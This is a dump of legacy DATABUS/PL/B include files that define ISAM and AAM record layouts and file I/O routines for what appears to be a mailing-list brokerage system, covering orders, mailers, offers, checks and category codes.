. DESCRIPTION : OPEN NIN ORDER FILE, DEPENDENT ON PATH NUMBER.
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NORDOPEN LOAD NORDNAME USING NORDPATH FROM NORDNME1,NORDNME2,NORDNME3
TRAP NORDGONE IF IO
OPEN NORDFILE,NORDNAME
TRAPCLR IO
MOVE NORDPATH TO NORDFLAG
RETURN
NORDGONE MOVE NORDNAME TO FILENAME
CALL FILEGONE
.
...............................................................................
.
. ENTRY POINT : NORDOPN2
. REQUIRED :
. RETURNED : 'NORDFLG2' SET TO '1', IF OPENNED.
. DESCRIPTION : OPEN NIN ORDER FILE, AIMDEXED
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NORDOPN2 TRAP NORDGNE2 IF IO
OPEN NORDFLE2,NORDNME2
TRAPCLR IO
MOVE C1 TO NORDFLG2
RETURN
NORDGNE2 MOVE NORDNME2 TO FILENAME
CALL FILEGONE
.
TRAPCLR IO
RETURN
...............................................................................
.
. ENTRY POINT : NORDOPN3
. REQUIRED :
. RETURNED : 'NORDFLG3' SET TO '1', IF OPENNED.
. DESCRIPTION : OPEN NIN ORDER FILE,
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NORDOPN3
goto nordgne3
TRAP NORDGNE3 IF IO
. OPEN NORDFLE3,NORDNME3
TRAPCLR IO
. MOVE C1 TO NORDFLG3
RETURN
NORDGNE3 MOVE NORDNME3 TO FILENAME
CALL FILEGONE
.
TRAPCLR IO
RETURN
norderr move "invalid path" to filename
call filegone
trapclr io
return
..............................................................................
<file_sep>/include/NXRF1DD.INC
******************************************************************************
*VARIABLE INCLUSION FOR DIAL IN BROKER/MAILER REF FILE.
******************************************************************************
* REVISION:
* 16JUN98 DLH ADDED ID CODE FOR GREATER SECURITY ON BBS.
*
* FILE: brk_MLR
* RECORD SIZE:
* COMPRESS: NONE
* TYPE: ISAM
* KEY: 1 ID & BROKER NUMBER 1-7
* KEY: 2 MAILER NUMBER 8-13 -
******************************************************************************
. Patch 1.1 ASH 15MAR2005 Mailer/Broker field conversion
. Note that this file is no longer used. Conversion is merely for protocol
.
.START PATCH 1.1 REPLACED LOGIC
.NXRF1FLE IFILE KEYLEN=8
..
.NXRF1FLG FORM 1
.NXRF1PTH FORM 1
.NXRF1NME DIM 8
.NXRF1NAM INIT "BRK_MLR "
..
.NXRF1FLD DIM 9
..
.NXRF1ID DIM 1 1-1 id B=BRK.CONSULT M=MAILER
.NXRF1BRK DIM 4 2-5 BROKER/CONSULTANT OR MAILER
.NXRF1MLR DIM 4 6-9 MAILER NUMBER
.NXRF1DTE DIM 8 11-17 DATE ADDED
.NXRF1USR DIM 10 21-30 WHOM
................................
NXRF1FLE IFILE KEYLEN=12
.
NXRF1FLG FORM 1
NXRF1PTH FORM 1
NXRF1NME DIM 8
NXRF1NAM INIT "BRK_MLR|NINS1:502"
.
NXRF1FLD DIM 13
.
NXRF1ID DIM 1 1-1 id B=BRK.CONSULT M=MAILER
NXRF1BRK DIM 6 2-7 BROKER/CONSULTANT OR MAILER
NXRF1MLR DIM 6 8-13 MAILER NUMBER
NXRF1DTE DIM 8 14-21 DATE ADDED
NXRF1USR DIM 10 22-31 WHOM
.END PATCH 1.1 REPLACED LOGIC
..............................................................................
<file_sep>/include/nmlrxydd.inc
..............................................................................
.
. NMLRXYDD INCLUSION
. NIN MAILER TO MAILER FILE DEFINITION
.
. FILE NAME : NINMLRXY
. REC LENGTH: 1068 FIXED
. INDEX KEY : (1) 1-12 (MAILER1/MAILER2)
.AIMDEX KEYS: (1) 1-12 (MAILER1/MAILER2)
.
..............................................................................
NMLRXYFLIST FILELIST
nmlrxyfile ifile keylen=12,FIXED=1068,Name="NINMLRXY.ISI"
nmlrxyfle2 Afile FIXED=1068,Name="NINmlrxy.AAM"
FILELISTEND
.
nmlrxyname init "NINMLRXY"
NMLRXYFLD DIM 12 .MAILER NUMBER 1 + MAILER NUMBER 2
NMLRXYFLD1 DIM 15 .MAILER NUMBER AIMKEY
NMLRXYFLAG FORM 1
NMLRXYLOCK FORM 1 0 or 1=File locks, 2=Record locks, 3=No locks
.
NMLRXYVARS LIST
NMLRXYMLR1 DIM 6 1-6 MAILER1 NUMBER
NMLRXYMLR2 DIM 6 7-12 MAILER2 NUMBER
NMLRXYNOTE DIM 750 13-762 NOTES
NMLRXYNOTE2 DIM 250 763-1012 NOTES
NMLRXYDATE DIM 8 1013-1020 RECORD DATE
NMLRXYUDATE DIM 8 1021-1028 UPDATE DATE
NMLRXYINITS DIM 10 1029-1038 PERSON WHO LAST MODIFIED
NMLRXYFILL DIM 30 1039-1068 FILLER
LISTEND
<file_sep>/include/DTPDD.inc
;.............................................................
. Patch 1.1 ASH 12/29/2004 - Mailer/Broker Conversion
.
.DTPFile Ifile Key=8,fixed=40
.DTPFlag Form 1
.DTPName Init "DaysToPay"
.;Workvars
.DTPFld Dim 8
.;
.DTPbroker Dim 4 1-4
.DTPMailer Dim 4 5-8
.DTP3yrcount form 5 9-13
.DTP3yrDays Form 9 14-22
.DTP1yrcount form 5 23-27
.DTP1yrDays Form 9 28-36
.DTPFill Dim 4 37-40
..............................................................
DTPFile Ifile Key=12,fixed=44
DTPFlag Form 1
DTPName Init "DaysToPay|NINS1:502 "
.;Workvars
DTPFld Dim 12
.;
DTPbroker Dim 6 1-6
DTPMailer Dim 6 7-12
DTP3yrcount form 5 13-17
DTP3yrDays Form 9 18-26
DTP1yrcount form 5 27-31
DTP1yrDays Form 9 32-40
DTPFill Dim 4 41-44
.;.............................................................
<file_sep>/include/npkgio2.inc
..............................................................................
.
. NPKGIO2 INCLUSION
. NIN PACKAGE 'Get Next Record' FILE IO ROUTINES
.
. FILE NAME : PKGNXT.DAT
.
. REC LENGTH: 25 FIXED
. INDEX KEY : 001-004 Mailer
.
.
..............................................................................
.NPKGNXTKEY - Isam key read
.
. ENTRY POINT : NPKGNXTKEY
. REQUIRED : 'NPKGNXTFLD'
. RETURNED : PACKAGE GET NEXT RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NPKGNXTKEY
BRANCH NPKGNXTFLAG TO NPKGNXT1
CALL NPKGNXTOPEN
NPKGNXT1
trap IOMssg giving Error if IO
FILEPI 1;NPKGNXTFILE
READ NPKGNXTFILE,NPKGNXTFLD;NPKGNXTVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPKGNXTTST
. REQUIRED : 'NPKGNXTFLD'
. RETURNED :
. DESCRIPTION : TEST KEY
.
NPKGNXTTST
BRANCH NPKGNXTFLAG TO NPKGNXT2
CALL NPKGNXTOPEN
NPKGNXT2
trap IOMssg giving Error if IO
FILEPI 1;NPKGNXTFILE
READ NPKGNXTFILE,NPKGNXTFLD;;
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPKGNXTSEQ
. REQUIRED :
. RETURNED : PACKAGE GET NEXT RECORD
. DESCRIPTION : SEQUENTIAL PACKAGE GET NEXT FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NPKGNXTSEQ
BRANCH NPKGNXTFLAG TO NPKGNXT4
CALL NPKGNXTOPEN
NPKGNXT4
trap IOMssg giving Error if IO
FILEPI 1;NPKGNXTFILE
READ NPKGNXTFLE2,SEQ;NPKGNXTVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPKGNXTWRT
. REQUIRED :
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
NPKGNXTWRT
BRANCH NPKGNXTFLAG OF NPKGNXT5
CALL NPKGNXTOPEN
NPKGNXT5
trap IOMssg giving Error if IO
FILEPI 1;NPKGNXTFILE
WRITE NPKGNXTFILE;NPKGNXTVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPKGNXTUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE PACKAGE FILE
.
NPKGNXTUPD
BRANCH NPKGNXTFLAG TO NPKGNXT6
CALL NPKGNXTOPEN
NPKGNXT6
trap IOMssg giving Error if IO
FILEPI 1;NPKGNXTFILE
UPDATE NPKGNXTFILE;NPKGNXTVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPKGNXTDEL
. REQUIRED : VALID FILE READ
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NPKGNXTDEL
BRANCH NPKGNXTFLAG TO NPKGNXT7
CALL NPKGNXTOPEN
NPKGNXT7
trap IOMssg giving Error if IO
FILEPI 1;NPKGNXTFILE
DELETE NPKGNXTFILE
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPKGNXTOPEN
. REQUIRED : 'NPKGNXTFLAG'
. RETURNED : 'NPKGNXTFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN PACKAGE 'GET NEXT RECORD' FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NPKGNXTOPEN
TRAP NPKGNXTGONE giving Error IF IO
BRANCH NPKGNXTLOCK TO NPKGNXTOPNL,NPKGNXTOPNR
NPKGNXTOPNL
OPEN NPKGNXTFILE,NPKGNXTNAME
OPEN NPKGNXTFLE2,NPKGNXTNAME
TRAPCLR IO
MOVE C1 TO NPKGNXTFLAG
RETURN
NPKGNXTOPNR
OPEN NPKGNXTFILE,NPKGNXTNAME,LOCKMANUAL,SINGLE
OPEN NPKGNXTFLE2,NPKGNXTNAME
TRAPCLR IO
MOVE C1 TO NPKGNXTFLAG
RETURN
.
NPKGNXTGONE
MOVE NPKGNXTNAME TO FILENAME
CALL FILEGONE
..............................................................................
.END OF INCLUDE
<file_sep>/include/NSPEDD.INC
...............................................................................
.
. NSPEDD INCLUSION
. NIN ORDER 00/99/98 FILE DEFINITION
.
. FILE NAME : NINSPEC
. REC LENGTH: 758 used to be 288 COMP
. INDEX KEY : 1-6
.PATCH #1.2 - DMB 18JUN05 Changed IP Address of File Manager
. Last update add nspelock DLH 10Jun98
.PATCH #1.1 - ASH 04May99 - File conversion/increase
..............................................................................
.
NSPEFILE IFILE KEYLEN=6,VAR=758,COMP,NODUPLICATES
.NSPENAME INIT "NINSPEC "
.>Patch 1.2 Begin
.NSPENAME INIT "NINSPEC.ISI|20.20.30.103:502"
NSPENAME INIT "NINSPEC.ISI|NINS1:502"
.>Patch 1.2 End
NSPEFLD DIM 6
NSPEFLAG FORM 1
nspelock form 1 0 or 1 - filepi, 2 =record locking, = no locks
..............................................................................
NSPEVARS list
NSPELR dim 6 1-6 LR NUMBER
DESC001 DIM 78 7-84 NON-MODIFIABLE XSTAT
DESC002 DIM 674 85-758 MODIFIABLE INSTRUCTIONS
listend
.
.desc002 gets parsed into 14 55 byte lines ???
<file_sep>/DEVELOP/ListMarketsProject/NCATCODEDD.INC
* NCATCODEDD.INC
* ************************************************************************************************
**
* NAMES IN THE NEWS MASTER CATEGORY CODES REFERENCE FILE
* ************************************************************************************************
**
.
. FILE: NINCODEDD.INC
. LENGTH: 14
. TYPE: ISAM/AAM
. KEY: 1-6 NCATCODENUM (LIST NUM)
. XXX
. XXX
. AAMKEY: XXXXXX
...................................................................................................
..
NCATCODENAME INIT "NINCODE"
NCATCODELIST FILELIST
NCATCODEFILE IFILE KEYLEN=6,FIXED=14,Name="NINCODE.isi"
NCATCODEFLE2 AFILE FIXED=14,Name="NINCODE.aam"
FILELISTEND
NCATCODEFLAG FORM 1
NCATCODEFLD DIM 6 // HOLD LIST NUM
NCATCODEFLD1 DIM 4 // 3 PLUS 1 FOR AAM READ
.
NCATCODEVARS LIST
NCATCODENUM DIM 6 1-6 LIST NUMBER
NCATCODETYPE DIM 1 7-7 LIST TYPE
.1 "B" Byrs/Subs
.2 "D" Dnrs/Mbrs
.3 "C" Compiled
NCATCODEMARKET DIM 27 8-34 BROAD MARKET
NCATCODESUBMARK DIM 43 35-77 SUB-MARKET
NCATCODEENV DIM 33 78-110 ENVIRONMENTAL
NCATCODEPOLIT DIM 33 111-143 POLITICAL
NCATCODEHEALTH DIM 29 144-172 HEALTH/CHARIT
NCATCODEPROG DIM 33 173-205 PROGRESSIVE
NCATCODEFOCUS DIM 1 206-206 LIST FOCUS
.1 "C" Christian
.2 "V" Veterans
.3 "P" Pets
.4 "W" Women
.5 "K" Children
.6 "S" Seniors
.7 "G" Gay/Lesbian
.8 "J" Jewish
NCATCODEFILL DIM 44 207-250
LISTEND
<file_sep>/include/MEDIAOLD.INC
. .............................................................................
. MEDIA TABLE.
. ............
.
MEDIA DIM 28
.
MED0 INIT "MAG TAPE 9T 1600 OR 6250 BPI"
MED1 INIT "DISKETTE "
MED2 INIT "4-ACROSS CHESHIRE"
MED3 INIT "PRESS.SENS.LABELS"
MED4 INIT "IBM 3480 TAPE CARTRIDGE"
MED5 INIT "1-UP CHESHIRE"
MED6 INIT "PACKAGE INSERTS"
MED7 INIT "MAG TAPE 9T 1600 BPI"
MED8 INIT "MAG TAPE 9T 800 OR 1600 BPI"
MED9 INIT "MATCH-COL TP"
MED10 INIT "MAGTAPE 9T 1600/6250 $15FLT"
MED11 INIT "MAGTAPE 9T 1600/6250 $20FLT"
MED12 INIT "MAGTAPE 9T 1600/6250 $25FLT"
MED13 INIT "MAGTAPE 9T 1600/6250 $30FLT"
MED14 INIT "MAGTAPE 9T 1600 $15FLT"
MED15 INIT "MAGTAPE 9T 1600 $20FLT"
MED16 INIT "MAGTAPE 9T 1600 $25FLT"
MED17 INIT "MAGTAPE 9T 1600 $30FLT"
MED18 INIT "PRESS.SENS.LABELS @ $7/M"
MED19 INIT "MAG TAPE SEE SPECIAL INST"
MED20 INIT " "
.MED20 INIT "really used by dummy orders"
MED21 INIT "PRESS.SENS.LABELS @ $10/M"
MED22 INIT " "
MED23 INIT " "
MED24 INIT " "
MED25 INIT " "
<file_sep>/include/COMMONNY.INC
..............................................................................
.
. COMMON
.
. COMMON UDA VARIABLES
.
$ERROR DIM *12 DATASHARE ERROR MESSAGE
$PORTN DIM *2 SOFT PORT NUMBER
$TODAY DIM *8 DATE IN mm/dd/yy FORMAT
$JULIAN FORM *5 TODAY IN yyjjj FORMAT
.
$USER DIM *10 USER ID
$USERNME DIM *10 USER NAME (FIRST INIT, LAST)
$PRIO FORM *3 OVERALL PRIORITY LEVEL
$LEVELS DIM *36 SECURITY LEVELS
$COMM DIM *1 COMMUNICATION ALLOWED
.
$COMPANY FORM *1 COMPANY CODE (1-NIN,2-CMP,3-DECK,4-DATA)
$COMPNME DIM *24 COMPANY NAME TEXT
$MULTCOS FORM *1 MULTIPLE COMPANIES ALLOWED
$CURSYS FORM *1 CURRENT SYSTEM
$CURLEVL FORM *1 CURRENT LEVEL WITHIN SYSTEM
$MULTSYS FORM *1 MULTIPLE SYSTEMS ALLOWED
$PROGRAM DIM *8 LAST PROGRAM NAME
$FUNC FORM *1
$COMMENT DIM *20
.
..............................................................................
<file_sep>/include/M2NLoIO.inc
..............................................................................
.******************************************************
.* M2N List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* M2N DATACARD FILES.
.* ****************************************************
.
. FILE: MIN2NIN
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam fixed
...................
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing M2N, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
...............................................
. ENTRY POINT : M2NLoKEY
. REQUIRED : 'M2NLoFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
M2NLoKEY Branch M2NLoPath,M2NLo1a,M2NLo1c
M2NLo1a BRANCH M2NLoFlag TO M2NLo1B
CALL M2NLoOpen
M2NLo1B FILEPI 1;M2NLoFile
READ M2NLoFile,M2NLoFld;M2NLoVars
RETURN
M2NLo1C BRANCH M2NLoFlag TO M2NLo1D
CALL M2NLoOpen
M2NLo1D FILEPI 1;M2NLoFile2
READ M2NLoFile2,M2NLoFld2;M2NLoVars
RETURN
..............................................................................
.
. ENTRY POINT : M2NLoTST
. REQUIRED : M2NLoFld
. RETURNED :
. DESCRIPTION : TEST KEY
.
M2NLoTST Branch M2NLoPath,M2NLo2a,M2NLo2C
M2NLo2a BRANCH M2NLoFlag TO M2NLo2B
CALL M2NLoOpen
M2NLo2B FILEPI 1;M2NLoFile
READ M2NLoFile,M2NLoFld;STR1
RETURN
M2NLo2c BRANCH M2NLoFlag TO M2NLo2D
CALL M2NLoOpen
M2NLo2d FILEPI 1;M2NLoFile2
READ M2NLoFile2,M2NLoFld2;STR1
RETURN
..............................................................................
.
. ENTRY POINT : M2NLoKS
. REQUIRED :
. RETURNED : M2NLo Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
M2NLoKS Branch M2NLoPath,M2NLo3a,M2NLo3C
M2NLo3A BRANCH M2NLoFlag TO M2NLo3B
CALL M2NLoOpen
M2NLo3B FILEPI 1;M2NLoFile
READKS M2NLoFile;M2NLoVars
RETURN
M2NLo3C BRANCH M2NLoFlag TO M2NLo3D
CALL M2NLoOpen
M2NLo3D FILEPI 1;M2NLoFile2
READKS M2NLoFile2;M2NLoVars
RETURN
..............................................................................
. ENTRY POINT : M2NLoSEQ
. REQUIRED :
. RETURNED : M2NLo Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
M2NLoSEQ BRANCH M2NLoFlag TO M2NLo4
CALL M2NLoOpen
M2NLo4 FILEPI 1;M2NLoFile
READ M2NLoFile,SEQ;M2NLoVars
RETURN
..............................................................................
.
. ENTRY POINT : M2NLoWRT
. REQUIRED : 'M2NLoFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
M2NLoWRT BRANCH M2NLoFlag TO M2NLo5
CALL M2NLoOpen
M2NLo5 FILEPI 1;M2NLoFlist
WRITE M2NLoFlist;M2NLoVars
RETURN
..............................................................................
.
. ENTRY POINT : M2NLoUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
M2NLoUPD BRANCH M2NLoFlag TO M2NLo6
CALL M2NLoOpen
M2NLo6
FILEPI 1;M2NLoFlist
UPDATE M2NLoFlist;M2NLoVars
RETURN
..............................................................................
.
. ENTRY POINT : M2NLoDEL
. REQUIRED : 'M2NLoFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
M2NLoDEL BRANCH M2NLoFlag TO M2NLo7
CALL M2NLoOpen
M2NLo7 FILEPI 1;M2NLoFlist
DELETE M2NLoFList
RETURN
..............................................................................
.
. ENTRY POINT : M2NLoOpen
. REQUIRED : 'M2NLoFlag' 'M2NLoPATH'
. RETURNED : 'M2NLoFlag' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
M2NLoOpen TRAP M2NLoGONE giving error IF IO
OPEN M2NLoFList
TRAPCLR IO
MOVE C1 TO M2NLoFlag
RETURN
..............................................................................
M2NLoGONE MOVE M2NLoNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/RobbSaves/apptop.inc
///////////////////////////////////////////////////////////////////////////////
//
// Program: apptop.inc
//
// Author: <EMAIL>
//
// Copyright: © 2004 Adjacency Consulting Group, Inc. All rights reserved.
//
// Date: 3 December 2004
//
// Purpose: Encapsulate required top-of-program inclusions
//
// Revision:
// ver03 29 DEC 2005 ASH - ADDED WEBSITE TRACKING FILE
// ver02 13 DEC 2005 ASH - ADDED CONSULTANT FILE
// ver01 03 DEC 2004 BJACKSOn
//
///////////////////////////////////////////////////////////////////////////////
include common.inc
include cons.inc
include cntdd.inc
include compdd.inc
include ndatdd.inc
include nxrfdd.inc
include norddd.inc
.START PATCH 02 ADDED LOGIC
include ncltdd.inc
.END PATCH 02 ADDED LOGIC
.START PATCH 03 ADDED LOGIC
include nwebdd.inc
.END PATCH 03 ADDED LOGIC
include user.io
include \\nins1\e\library\include\RobbSaves\CGILibrary.inc
include sessionmgmt.inc
///////////////////////////////////////////////////////////////////////////////
RELEASE INIT "PHASE II"
///////////////////////////////////////////////////////////////////////////////
<file_sep>/include/NMLCIO.INC
*******************************************************************************
* NMLCIO/INC - I-O INCLUDE FOR MLRCATS FILE. *
*******************************************************************************
* CREATED - 03/07/91 *
*******************************************************************************
.
NMLCKEY BRANCH NMLCFLAG TO NMLC1
CALL NMLCOPEN
NMLC1 FILEPI 1;NMLCFILE
READ NMLCFILE,NMLCFLD;NMLCNUM:
NMLCCAT
RETURN
..............................................................................
NMLCTST BRANCH NMLCFLAG TO NMLC2
CALL NMLCOPEN
NMLC2 FILEPI 1;NMLCFILE
READ NMLCFILE,NMLCFLD;STR1;
RETURN
..............................................................................
NMLCKS BRANCH NMLCFLAG TO NMLC3
CALL NMLCOPEN
NMLC3 FILEPI 1;NMLCFILE
READ NMLCFILE,SEQ;NMLCNUM:
NMLCCAT
RETURN
.
..............................................................................
.
NMLCWRT BRANCH NMLCFLAG TO NMLC5
CALL NMLCOPEN
NMLC5 FILEPI 1;NMLCFILE
WRITE NMLCFILE,NMLCFLD;NMLCNUM:
NMLCCAT
RETURN
..............................................................................
.
NMLCDEL BRANCH NMLCFLAG TO NMLC7
CALL NMLCOPEN
NMLC7 FILEPI 1;NMLCFILE
DELETE NMLCFILE,NMLCFLD
RETURN
..........................................................................
NMLCOPEN TRAP NMLCGONE IF IO
OPEN NMLCFILE,NMLCNAME
TRAPCLR IO
MOVE C1 TO NMLCFLAG
RETURN
.............................................................................
NMLCGONE MOVE NMLCNAME TO FILENAME
CALL FILEGONE
..............................................................................
.<file_sep>/include/SRDSTXTdd.inc
.******************************************************
.* SRDS List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* SRDS DATACARD FILES.
.* ****************************************************
.
. FILE: SRDS_TXT
. LENGTH:
. COMPRESS: NONE
. TYPE: XML from SRDS if there is not a hit
. on our system they get put into an indexed/aimdexed file for review
......................................................
. LAST MODIFIED
. patch 1.0 14 September 2011 DLH New
......................................................
.
SRDSTXTFList Filelist
SRDSTXTFILE IFILE fixed=58,Name="SRDS_TXT.Isi|NINS1:502"
SRDSTXTFLE1 IFILE fixed=58,Name="SRDS_TXT1.Isi|NINS1:502"
FilelistEND
SRDSTXTNAME Init "SRDS_TXT|NINS1:502"
SRDSTXTFLAG FORM 1
SRDSTXTPATH FORM 1
SRDStxtLock FORM 1
SRDStxtFLd Dim 6
SRDStxtFLd1 Dim 8
.
SRDStxtVARS LIST .
SRDSTXTLSTNUM DIM 6 1-6 ZERO FILLED KEY.
SRDSTXTNUM DIM 2 7-8 ZERO FILLED KEY.
SRDSTxt DIM 50 9-58 misc unformated pricing info
.SRDSTxt DIM 250 9-258 misc unformated pricing info
. will be prepended to data card text? from a new datacard file
LISTEND
<file_sep>/DEVELOP/Includes - why/NOFRDD.INC
..............................................................................
.
. NOFRDD INCLUSION
. NIN OFFER FILE DEFINITION
.
. FILE NAME : NINOFR
. REC LENGTH: 66 FIXED
. INDEX KEY : 2-8 (4 POSITION MLR#, 3 POSITION OFFER#)
.
. RElease 1.2 24Apr07 DLH added file manager
. RELEASE 1.1 17OCT02 ASH ADDED AIM FILE FUNCTIONALITY
..............................................................................
.
.START PATCH 1.1 REPLACED LOGIC
.NOFRFILE IFILE KEYLEN=7,FIXED=64,UNCOMP
NOFRFLIST FILELIST
NOFRFILE IFILE KEYLEN=9,FIXED=68,UNCOMP,Name="NINOFR.ISI|NINS1:502"
NOFRFLE2 AFILE FIXED=68,UNCOMP,Name="NINOFR.AAM|NINS1:502"
FILELISTEND
.END PATCH 1.1 REPLACED LOGIC
NOFRNAME INIT "NINOFR|NINS1:502 "
NOFRFLD DIM 9
.START PATCH 1.1 REPLACED LOGIC
NOFRFLD1 DIM 9
.END PATCH 1.1 REPLACED LOGIC
NOFRFLAG FORM 1
NOFRLOCK FORM 1 0 or 1=File locks, 2=Record locks, 3=no locks
* ....................................................
.
ofrvars list
OFCODE DIM 1 1-1 'R'
OFMLR DIM 6 2-7 MAILER NUMBER KEY.
OFNUM DIM 3 8-10 OFFER NUMBER KEY.
OFDESC DIM 40 11-50 OFFER DESCRIPTION.
OFNAME DIM 10 51-60 LAST UPDATED BY.
.OFDATE DIM 6 59-64 DATE LAST UPDATED.
OFDATE DIM 8 61-68 DATE LAST UPDATED.
listend
...............................................................................
LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
.NLCR0011 DATABUS
.NDAT0010 DATABUS
.NDAT0012 DATABUS
.NDIV0001 DATABUS
.NDIV0002 DATABUS
.EPSSPOOL DATABUS
.NLCR0009 DATABUS
.NORD0009 DATABUS
.NAPR0001 DATABUS
.NLCR0001 DATABUS
.NORD0001 DATABUS
.NOFR0001 DATABUS
.PAYORDERPRT DATABUS
.SPOOLLCRS DATABUS
.NORD0023 DATABUS
.NORD0024 DATABUS
.WARSPOOL DATABUS
.WARVIEW DATABUS
.NDAT0004 DATABUS
.NAPR0002 DATABUS
LISTON
<file_sep>/include/MD090DD.INC
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_M090
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: FLAT Comma Delimited
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDC090DD - CAtegory
.MDC091DD - Owner ???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
......................................................
M090NAME DIM 12
M090FILE IFILE Name="MDC_090C.isi|NINS1:502"
M090SFILE FILE
.M090SFILE FILE Name="MDC_090.csv"
M090FLd Dim 5
M090FLAG FORM 1
M090PATH FORM 1
.
M090VARS LIST .for ease I am using Min's names
GKEY Dim 5 1-5 LO Code#
GNAM Dim 25 Name
GAD1 Dim 25 Address 1
GAD2 Dim 25 Address 2
GCTY Dim 20 City
GSTT Dim 2 State
GZIP Dim 10 Zip
GCTR Dim 25 Country
GCNT Dim 25 Contact
GPH1 Dim 11 Phone
GPH2 Dim 11 Phone
GPHF Dim 11 FAX
GPHM Dim 11 Modem
GDLT Dim 1 'A'ctive/'I'nactive
ListEnd
<file_sep>/DEVELOP/Includes - why/nchkddnew.inc
..............................................................................
.
. NCHKDD INCLUSION
.
. FILE NAME : NINCHK.DAT
. REC LENGTH: 129
. INDEX KEY : 1-36 CONTROL NUMBER + CONTROL DATE + CHECK NUMBER
. AAMDEX KEY: 1-11 CONTROL NUMBER/CONTROL DATE
. 12-36 CHECK NUMBER
. 45-59 AMOUNT
. 60-104 PAYOR
..............................................................................
.
NCHKLIST Filelist
.NCHKFILE IFILE KEYLEN=36,FIXED=129,NODUPLICATES
.NCHKFLE2 AFILE FIXED=129
NCHKFILE IFILE NAME="NINCHK.ISI"
NCHKFLE2 AFILE NAME="NINCHK.AAM"
Filelistend
NCHKNAME INIT "NINCHK"
NCHKFLD DIM 36
NCHKFLD1 DIM 14
NCHKFLD2 DIM 28
NCHKFLD3 DIM 18
NCHKFLD4 DIM 48
NCHKFLAG FORM 1
NCHKlock form 1 0 or 1 - filepi, 2 =record locking, = no locks
..............................................................................
NCHKVARS list
NCHKCONT DIM 3 1-3 CONTROL NUMBER (KEY) (AAMKEY)
NCHKCONTD DIM 8 4-11 CONTROL DATE (AAMKEY)
NCHKNUM DIM 25 12-36 CHECK NUMBER (KEY) (AAMKEY)
NCHKDATE DIM 8 37-44 CHECK DATE - CCYYMMDD
NCHKAMT FORM 12.2 45-59 CHECK AMOUNT
NCHKPAYOR DIM 45 60-104 CHECK PAYOR
NCHKFILL DIM 25 105-129 FILL
listend
<file_sep>/include/NCKIDD.inc
..............................................................................
.
. NCKIDD INCLUSION
. NIN MANUAL CHECK FILE DEFINITION
.
.CREATED 12JUL93
.
. FILE NAME : CHKINFO
. REC LENGTH: 44 FIXED
.
. AIM KEYS : 01-06 INVOICE NUMBER
.begin patch 1.1
.. 08-13 OLD CHECK NUMBER (old values)
.. 20-25 NEW CHECK NUMBER (old values)
. 08-13 OLD CHECK NUMBER (new values)
. 22-27 NEW CHECK NUMBER (new values)
.end patch 1.1
.patch 1.1 27 DLH NININV Y2k
..............................................................................
.
.begin patch 1.1
.NCKIFILE FILE FIXED=45
.NCKIFLE1 AFILE FIXED=45
NCKIFILE FILE FIXED=75
NCKIFLE1 AFILE FIXED=74
.end patch 1.1
NCKINAME INIT "CHKINFO "
.
NCKIFLD DIM 9
NCKIFLD2 DIM 9
NCKIFLD3 DIM 9
NCKIFLAG FORM 1
NCKIFLG1 FORM 1
NCKIPATH FORM 1
.
NCKIVARS LIST
NCKIINV DIM 6 001-006 INVOICE NUMBER REQUIRED, KEY 1.
NCKISTAT FORM 1 007-007 4="MANUAL ISSUED", 3="VOID".
. 2=VOID/CONTRA, 1=VOID/REISSUE.
. 5="MANUAL ISSUED ON OPEN INV"
NCKIONUM DIM 6 008-013 CHECK NUMBER VOIDED, KEY 2.
.begin patch 1.1
.NCKIDTE DIM 6 014-019 DATE OF OLD CHECK.
NCKIDTE DIM 8 014-021 DATE OF OLD CHECK. ccyymmdd
.end patch 1.1
NCKINNUM DIM 6 022-027 NEW CHECK NUMBER, KEY 3.
.NCKIDATE DIM 6 026-031 DATE ENTERED
.begin patch 1.1
